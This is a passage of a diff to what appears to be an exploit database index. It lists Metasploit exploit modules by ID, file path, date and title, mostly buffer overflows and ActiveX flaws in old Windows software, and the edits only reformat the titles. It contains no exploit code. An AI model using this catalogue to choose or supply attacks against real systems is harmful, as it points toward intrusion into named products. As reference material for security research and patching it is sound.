Overflow",2010-06-15,Metasploit,windows,remote,0 -16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net Font Field Overflow",2010-06-15,Metasploit,windows,remote,0 +16453,platforms/windows/remote/16453.rb,"Borland Interbase - Create-Request Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow",2010-06-15,Metasploit,windows,remote,0 16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)",2010-09-20,Metasploit,windows,remote,0 16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 -16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 Alert Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 - Alert Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16460,platforms/windows/remote/16460.rb,"SecureCRT 4.0 Beta 2 SSH1 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16464,platforms/windows/remote/16464.rb,"ISS PAM.dll ICQ Parser Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16464,platforms/windows/remote/16464.rb,"ISS - PAM.dll ICQ Parser Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow",2010-06-15,Metasploit,windows,remote,0 16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 - Overflow (Win32)",2010-05-09,Metasploit,win_x86,remote,0 -16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS CGI Filename Double Decode Command Execution",2011-01-08,Metasploit,windows,remote,0 +16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution",2011-01-08,Metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,Metasploit,windows,remote,0 -16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 Printer Host Header Overflow",2010-04-30,Metasploit,windows,remote,0 +16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow",2010-04-30,Metasploit,windows,remote,0 16470,platforms/windows/remote/16470.rb,"Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow",2010-07-25,Metasploit,windows,remote,0 16471,platforms/windows/remote/16471.rb,"Microsoft IIS WebDAV Write Access Code Execution",2010-09-20,Metasploit,windows,remote,0 -16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 IDQ Path Overflow",2010-06-15,Metasploit,windows,remote,0 +16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 - IDQ Path Overflow",2010-06-15,Metasploit,windows,remote,0 16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16474,platforms/windows/remote/16474.rb,"Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow",2010-07-01,Metasploit,windows,remote,0 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD (2.35) - Login Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,Metasploit,windows,remote,0 -16478,platforms/windows/remote/16478.rb,"Novell NetMail 3.52d IMAP SUBSCRIBE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16478,platforms/windows/remote/16478.rb,"Novell NetMail 3.52d - IMAP SUBSCRIBE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16479,platforms/windows/remote/16479.rb,"IMail IMAP4D - Delete Overflow",2010-09-20,Metasploit,windows,remote,0 16480,platforms/windows/remote/16480.rb,"MailEnable IMAPD W3C Logging Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow",2010-08-25,Metasploit,windows,remote,0 -16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16483,platforms/windows/remote/16483.rb,"Novell NetMail 3.52d IMAP STATUS Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16483,platforms/windows/remote/16483.rb,"Novell NetMail 3.52d - IMAP STATUS Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16484,platforms/windows/remote/16484.rb,"Mercury/32 4.01a - IMAP RENAME Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16486,platforms/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16488,platforms/windows/remote/16488.rb,"Novell NetMail 3.52d IMAP APPEND Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16488,platforms/windows/remote/16488.rb,"Novell NetMail 3.52d - IMAP APPEND Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 - Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16491,platforms/windows/remote/16491.rb,"WinVNC Web Server 3.3.3r7 - GET Overflow",2009-12-06,Metasploit,windows,remote,0 -16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 -16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",2010-12-01,Metasploit,windows,remote,0 +16492,platforms/windows/remote/16492.rb,"Novell iPrint Client - ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 +16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI - ActiveX Control Arbitrary File Download",2010-12-01,Metasploit,windows,remote,0 16494,platforms/windows/remote/16494.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit",2011-01-22,Metasploit,multiple,remote,0 -16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16497,platforms/windows/remote/16497.rb,"RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16497,platforms/windows/remote/16497.rb,"RealPlayer - ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration",2010-09-20,Metasploit,windows,remote,0 -16500,platforms/windows/remote/16500.rb,"Hyleos ChemView ActiveX Control Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 -16501,platforms/windows/remote/16501.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 +16500,platforms/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 +16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (1)",2010-04-30,Metasploit,windows,local,0 16504,platforms/windows/local/16504.rb,"Adobe - util.printf() Buffer Overflow",2010-05-03,Metasploit,windows,local,0 16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow",2010-07-16,Metasploit,windows,remote,0 16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 -16508,platforms/windows/remote/16508.rb,"Novell iPrint Client ActiveX Control Buffer Overflow",2008-06-16,Metasploit,windows,remote,0 +16508,platforms/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow",2008-06-16,Metasploit,windows,remote,0 16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit",2011-02-22,Metasploit,windows,remote,0 16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager Stack Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 -16511,platforms/windows/remote/16511.rb,"Logitech VideoCall ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 -16513,platforms/windows/remote/16513.rb,"Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 -16514,platforms/windows/remote/16514.rb,"Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 -16515,platforms/windows/remote/16515.rb,"Worldweaver DX Studio Player 3.0.29 shell.execute() Command Execution",2010-05-26,Metasploit,windows,remote,0 -16516,platforms/windows/remote/16516.rb,"Microsoft WMI Administration Tools ActiveX Buffer Overflow",2011-01-14,Metasploit,windows,remote,0 -16517,platforms/windows/remote/16517.rb,"IBM Access Support ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16518,platforms/windows/remote/16518.rb,"Chilkat Crypt ActiveX WriteFile Unsafe Method",2010-09-20,Metasploit,windows,remote,0 +16511,platforms/windows/remote/16511.rb,"Logitech VideoCall - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj - ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 +16513,platforms/windows/remote/16513.rb,"Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16514,platforms/windows/remote/16514.rb,"Novell iPrint Client - ActiveX Control ExecuteRequest Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 +16515,platforms/windows/remote/16515.rb,"Worldweaver DX Studio Player 3.0.29 - shell.execute() Command Execution",2010-05-26,Metasploit,windows,remote,0 +16516,platforms/windows/remote/16516.rb,"Microsoft WMI Administration Tools - ActiveX Buffer Overflow",2011-01-14,Metasploit,windows,remote,0 +16517,platforms/windows/remote/16517.rb,"IBM Access Support - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16518,platforms/windows/remote/16518.rb,"Chilkat Crypt - ActiveX WriteFile Unsafe Method",2010-09-20,Metasploit,windows,remote,0 16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow",2010-09-20,Metasploit,windows,remote,0 -16521,platforms/windows/remote/16521.rb,"Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16523,platforms/windows/remote/16523.rb,"Novell iPrint Client ActiveX Control target-frame Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player SceneURL Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16521,platforms/windows/remote/16521.rb,"Windows Media Encoder 9 - wmex.dll ActiveX Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger - YVerInfo.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16523,platforms/windows/remote/16523.rb,"Novell iPrint Client - ActiveX Control target-frame Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player - SceneURL Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger - goaway Overflow",2010-07-03,Metasploit,windows,remote,0 16526,platforms/windows/remote/16526.rb,"Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,Metasploit,windows,remote,0 -16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 RTSP URI Buffer Overflow",2010-05-04,Metasploit,windows,remote,0 -16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16529,platforms/windows/remote/16529.rb,"WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow",2010-05-04,Metasploit,windows,remote,0 +16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16529,platforms/windows/remote/16529.rb,"WinDVD7 - IASystemInfo.DLL ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16530,platforms/windows/remote/16530.rb,"mIRC IRC URL Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow",2010-04-30,Metasploit,windows,local,0 16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling",2010-07-03,Metasploit,windows,remote,0 16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use-After-Free",2011-02-08,Metasploit,windows,remote,0 -16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16535,platforms/windows/remote/16535.rb,"Trend Micro OfficeScan Client ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16535,platforms/windows/remote/16535.rb,"Trend Micro OfficeScan - Client ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16536,platforms/windows/remote/16536.rb,"Green Dam URL Processing Buffer Overflow",2010-03-10,Metasploit,windows,remote,0 16537,platforms/windows/remote/16537.rb,"Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption",2010-07-20,Metasploit,windows,remote,0 -16538,platforms/windows/remote/16538.rb,"McAfee Visual Trace ActiveX Control Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 -16539,platforms/windows/remote/16539.rb,"Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker ActiveX Control Arbitrary File Download",2010-11-24,Metasploit,windows,remote,0 +16538,platforms/windows/remote/16538.rb,"McAfee Visual Trace - ActiveX Control Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16539,platforms/windows/remote/16539.rb,"Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker - ActiveX Control Arbitrary File Download",2010-11-24,Metasploit,windows,remote,0 16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution",2010-09-28,Metasploit,windows,remote,0 16542,platforms/windows/webapps/16542.rb,"Microsoft OWC Spreadsheet HTMLURL Buffer Overflow",2010-04-30,Metasploit,windows,webapps,0 -16543,platforms/windows/remote/16543.rb,"Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail epi.dll AuthCredential Format String Exploit",2010-09-20,Metasploit,windows,remote,0 -16545,platforms/windows/remote/16545.rb,"Microsoft Help Center XSS and Command Execution",2010-09-20,Metasploit,windows,remote,0 +16543,platforms/windows/remote/16543.rb,"Novell iPrint Client - ActiveX Control Date/Time Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail - epi.dll AuthCredential Format String Exploit",2010-09-20,Metasploit,windows,remote,0 +16545,platforms/windows/remote/16545.rb,"Microsoft Help Center - XSS / Command Execution",2010-09-20,Metasploit,windows,remote,0 16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,Metasploit,windows,local,0 16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption",2010-07-12,Metasploit,windows,remote,0 16548,platforms/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow",2010-05-09,Metasploit,windows,remote,0 16549,platforms/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow",2010-05-09,Metasploit,windows,remote,0 16550,platforms/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker",2010-09-24,Metasploit,windows,remote,0 16551,platforms/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption",2011-01-20,Metasploit,windows,remote,0 -16552,platforms/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab ActiveX Unsafe Method",2010-09-20,Metasploit,windows,remote,0 -16553,platforms/windows/remote/16553.rb,"BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16554,platforms/windows/remote/16554.rb,"America Online ICQ ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 +16552,platforms/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab - ActiveX Unsafe Method",2010-09-20,Metasploit,windows,remote,0 +16553,platforms/windows/remote/16553.rb,"BaoFeng Storm - mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16554,platforms/windows/remote/16554.rb,"America Online ICQ - ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption",2010-07-12,Metasploit,windows,remote,0 16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - (ASX Filename) Buffer Overflow",2010-05-09,Metasploit,windows,local,0 -16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar - askBar.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 - Invalid SMIL URI Buffer Overflow",2011-01-08,Metasploit,windows,remote,0 -16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer ActiveX Control Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16560,platforms/windows/remote/16560.rb,"Autodesk IDrop ActiveX Control Heap Memory Corruption",2010-04-30,Metasploit,windows,remote,0 +16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer - ActiveX Control Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16560,platforms/windows/remote/16560.rb,"Autodesk IDrop - ActiveX Control Heap Memory Corruption",2010-04-30,Metasploit,windows,remote,0 16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution",2010-09-20,Metasploit,windows,remote,0 -16562,platforms/windows/local/16562.rb,"Apple ITunes 4.7 Playlist Buffer Overflow",2010-05-09,Metasploit,windows,local,0 -16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16562,platforms/windows/local/16562.rb,"Apple ITunes 4.7 - Playlist Buffer Overflow",2010-05-09,Metasploit,windows,local,0 +16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer - vcst_eu.dll ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow",2010-07-03,Metasploit,windows,remote,0 16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow",2010-07-26,Metasploit,windows,remote,0 16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption",2010-04-30,Metasploit,windows,remote,0 -16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE - JuniperSetupDLL.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16569,platforms/windows/remote/16569.rb,"Orbit Downloader Connecting Log Creation Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 SceneURL Download and Execute",2010-09-20,Metasploit,windows,remote,0 -16571,platforms/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16572,platforms/windows/remote/16572.rb,"GOM Player ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 - SceneURL Download and Execute",2010-09-20,Metasploit,windows,remote,0 +16571,platforms/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16572,platforms/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16573,platforms/windows/remote/16573.rb,"Macrovision InstallShield Update Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16574,platforms/windows/remote/16574.rb,"Microsoft Windows Shell LNK Code Execution",2010-09-21,Metasploit,windows,remote,0 -16575,platforms/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16576,platforms/windows/remote/16576.rb,"Persits XUpload ActiveX AddFile Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16577,platforms/windows/remote/16577.rb,"CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16575,platforms/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16576,platforms/windows/remote/16576.rb,"Persits XUpload - ActiveX AddFile Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16577,platforms/windows/remote/16577.rb,"CA BrightStor ARCserve Backup - AddColumn() ActiveX Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16578,platforms/windows/remote/16578.rb,"Microsoft Internet Explorer - createTextRange() Code Execution",2010-09-20,Metasploit,windows,remote,0 -16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center - ActiveX Control ProgColor Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16581,platforms/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020)",2010-08-25,Metasploit,windows,remote,0 16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption",2010-09-20,Metasploit,windows,remote,0 -16584,platforms/windows/remote/16584.rb,"RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",2010-06-15,Metasploit,windows,remote,0 +16584,platforms/windows/remote/16584.rb,"RealPlayer - rmoc3260.dll ActiveX Control Heap Corruption",2010-06-15,Metasploit,windows,remote,0 16585,platforms/windows/remote/16585.rb,"Sun Java Web Start Plugin Command Line Argument Injection",2010-09-21,Metasploit,windows,remote,0 -16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer SMIL Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer - SMIL Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16587,platforms/windows/remote/16587.rb,"Sun Java Runtime New Plugin docbase Buffer Overflow",2011-01-08,Metasploit,windows,remote,0 16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",2011-01-08,Metasploit,windows,local,0 +16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution",2011-01-08,Metasploit,windows,local,0 16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviors Use-After-Free",2010-12-14,Metasploit,windows,remote,0 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit",2010-06-15,Metasploit,windows,local,0 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave - rcsL Memory Corruption",2010-10-22,Metasploit,windows,remote,0 -16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 - SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution",2010-10-04,Metasploit,windows,remote,0 16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - VML Fill Method Code Execution",2010-07-03,Metasploit,windows,remote,0 -16598,platforms/windows/remote/16598.rb,"Persits XUpload ActiveX MakeHttpRequest Directory Traversal",2010-11-11,Metasploit,windows,remote,0 